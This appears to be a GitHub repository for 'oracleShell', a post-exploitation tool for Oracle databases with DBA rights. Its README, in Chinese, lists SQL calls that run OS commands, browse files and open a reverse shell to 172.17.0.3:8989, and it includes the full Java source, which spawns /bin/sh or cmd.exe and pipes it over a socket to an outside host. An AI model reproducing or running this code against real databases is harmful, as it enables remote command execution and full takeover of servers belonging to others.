├── README.md
├── cmd.jpg
├── filemanager.jpg
├── oracleShell.jar
└── shell.png


/README.md:
--------------------------------------------------------------------------------
  1 | # oracleShell oracle 数据库命令执行
  2 | 
  3 | ![](./cmd.jpg)
  4 | 
  5 | ![](./filemanager.jpg)
  6 | 
  7 | ### 测试环境-DBA权限：
  8 | 
  9 | `SELECT * FROM v$version`
 10 | 
 11 | ```
 12 | Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
 13 | PL/SQL Release 11.2.0.1.0 - Production
 14 | "CORE	11.2.0.1.0	Production"
 15 | TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
 16 | NLSRTL Version 11.2.0.1.0 - Production
 17 | ```
 18 | 
 19 | Function
 20 | =======
 21 | 
 22 | ```
 23 | 命令执行
 24 | select run('exec','whoami','UTF-8') from dual;
 25 | 文件管理
 26 | select run('list','/usr','UTF-8') from dual;
 27 | 获取当前路径
 28 | select run('getCurrentDir','','UTF-8') from dual;
 29 | 反弹shell
 30 | select run('connectBack','172.17.0.3^8989','UTF-8') from dual;
 31 | 
 32 | ```
 33 | 
 34 | ![](./shell.png)
 35 | 
 36 | Shell.java
 37 | ==========
 38 | 
 39 | ```
 40 | import java.io.BufferedReader;
 41 | import java.io.BufferedWriter;
 42 | import java.io.File;
 43 | import java.io.IOException;
 44 | import java.io.InputStream;
 45 | import java.io.InputStreamReader;
 46 | import java.io.OutputStream;
 47 | import java.io.OutputStreamWriter;
 48 | import java.net.Socket;
 49 | import java.util.Date;
 50 | 
 51 | public class Shell extends Object {
 52 |     public static String run(String methodName, String params, String encoding) {
 53 |         String result = "";
 54 |         if (methodName.equalsIgnoreCase("exec")) {
 55 |             result = Shell.exec(params, encoding);
 56 |         } else if (methodName.equalsIgnoreCase("list")) {
 57 |             result = Shell.list(params, encoding);
 58 |         } else if (methodName.equalsIgnoreCase("getCurrentDir")) {
 59 |             result = Shell.getCurrentDir();
 60 |         } else if (methodName.equalsIgnoreCase("connectBack")) {
 61 |             String ip = params.substring(0, params.indexOf("^"));
 62 |             String port = params.substring(params.indexOf("^") + 1);
 63 |             result = Shell.connectBack(ip, Integer.parseInt(port));
 64 |         } else {
 65 |             result = "unkown methodName";
 66 |         }
 67 |         return result;
 68 |     }
 69 | 
 70 |     public static String exec(String cmd, String encoding) {
 71 |         String result = "";
 72 |         if (encoding == null || encoding.equals("")) {
 73 |             encoding = "utf-8";
 74 |         }
 75 |         Process p;
 76 |         try {
 77 |             p = Runtime.getRuntime().exec(cmd);
 78 |             try {
 79 |                 p.waitFor();
 80 |             } catch (InterruptedException e) {
 81 |                 result += e.getMessage();
 82 |                 e.printStackTrace();
 83 |             }
 84 |             InputStream fis;
 85 |             if (p.exitValue() == 0) fis = p.getInputStream();
 86 |             else fis = p.getErrorStream();
 87 |             InputStreamReader isr = new InputStreamReader(fis);
 88 |             BufferedReader br = new BufferedReader(isr);
 89 |             String line = null;
 90 |             while ((line = br.readLine()) != null) {
 91 |                 result += line + "\n";
 92 |             }
 93 |         } catch (IOException e) {
 94 |             result += e.getMessage();
 95 |         }
 96 |         return result;
 97 |     }
 98 | 
 99 |     public static String list(String path, String encoding) {
100 |         String result = "";
101 |         if (encoding == null || encoding.equals("")) {
102 |             encoding = "utf-8";
103 |         }
104 |         File file = new File(path);
105 |         File[] items = file.listFiles();
106 |         for (int i = 0; i < items.length; i++) {
107 |             File item = items[i];
108 |             String type = item.isDirectory() ? "<DIR>" : " ";
109 |             String size = item.isDirectory() ? " " : item.length() / 1024 + "KB";
110 |             if (size.equals("0KB")) size = item.length() + "Byte";
111 |             String date = new Date(item.lastModified()).toLocaleString();
112 |             result += date + " " + type + " " + size + " " + item.getName() + "\n";
113 |         }
114 |         return result;
115 |     }
116 | 
117 |     public static String getCurrentDir() {
118 |         String result = "";
119 |         File directory = new File("");
120 |         try {
121 |             result = directory.getAbsolutePath();
122 |         } catch (Exception e) {
123 |         }
124 |         return result;
125 |     }
126 | 
127 |     public static String connectBack(String ip, int port) {
128 |         class StreamConnector extends Thread {
129 |             InputStream sp;
130 |             OutputStream gh;
131 | 
132 |             StreamConnector(InputStream sp, OutputStream gh) {
133 |                 this.sp = sp;
134 |                 this.gh = gh;
135 |             }
136 | 
137 |             public void run() {
138 |                 BufferedReader xp = null;
139 |                 BufferedWriter ydg = null;
140 |                 try {
141 |                     xp = new BufferedReader(new InputStreamReader(this.sp));
142 |                     ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
143 |                     char buffer[] = new char[8192];
144 |                     int length;
145 |                     while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
146 |                         ydg.write(buffer, 0, length);
147 |                         ydg.flush();
148 |                     }
149 |                 } catch (Exception e) {
150 |                 }
151 |                 try {
152 |                     if (xp != null) xp.close();
153 |                     if (ydg != null) ydg.close();
154 |                 } catch (Exception e) {
155 |                 }
156 |             }
157 |         }
158 |         try {
159 |             String ShellPath;
160 |             if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
161 |                 ShellPath = new String("/bin/sh");
162 |             } else {
163 |                 ShellPath = new String("cmd.exe");
164 |             }
165 |             Socket socket = new Socket(ip, port);
166 |             Process process = Runtime.getRuntime().exec(ShellPath);
167 |             (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
168 |             (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
169 |         } catch (Exception e) {
170 |         }
171 |         return "^OK^";
172 |     }
173 | }
174 | ```
175 | 
176 | 
177 | 
178 | 
179 | ### 参考链接：
180 | 
181 | rebeyond-oracleShell.jar
182 | 
183 | 
184 | 
185 | 
186 | 
187 | 


--------------------------------------------------------------------------------
/cmd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/cmd.jpg


--------------------------------------------------------------------------------
/filemanager.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/filemanager.jpg


--------------------------------------------------------------------------------
/oracleShell.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/oracleShell.jar


--------------------------------------------------------------------------------
/shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/oracleShell/cd5688993d84e249a03a1ec2cd90a094899333e1/shell.png


--------------------------------------------------------------------------------